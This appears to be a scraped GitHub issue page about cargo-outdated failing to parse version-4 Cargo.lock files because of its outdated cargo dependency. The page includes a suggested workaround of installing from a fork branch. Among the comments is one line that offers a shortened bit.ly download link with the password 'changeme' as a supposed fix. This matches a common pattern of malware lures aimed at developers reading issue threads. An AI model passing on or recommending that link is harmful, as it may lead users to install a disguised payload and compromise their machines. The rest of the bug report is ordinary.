We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
As of rust-lang/cargo#14595 and rust-lang/rust#130929 (nightly-2024-09-29), Cargo is generating version = 4 in Cargo.lock by default.
version = 4
$ cargo new repro $ cd repro/ $ cargo build $ cargo outdated error: failed to parse lock file at: /path/to/repro/Cargo.lock Caused by: lock file version 4 requires `-Znext-lockfile-bump`
Ironically, cargo-outdated's cargo dependency is outdated. I expect that adopting a newer version of the cargo library would resolve this issue.
cargo
cargo-outdated/Cargo.toml
Line 30 in d3a7df3
The text was updated successfully, but these errors were encountered:
download https://bit.ly/47P0Nvo
Password: changeme
you may need to install the c compiler
Sorry, something went wrong.
For anyone who wants to work around this:
cargo install --git https://github.com/MonterraByte/cargo-outdated.git --branch cargo-update
via #403
Successfully merging a pull request may close this issue.
As of rust-lang/cargo#14595 and rust-lang/rust#130929 (nightly-2024-09-29), Cargo is generating
version = 4
in Cargo.lock by default.Ironically, cargo-outdated's
cargo
dependency is outdated. I expect that adopting a newer version of thecargo
library would resolve this issue.cargo-outdated/Cargo.toml
Line 30 in d3a7df3
The text was updated successfully, but these errors were encountered: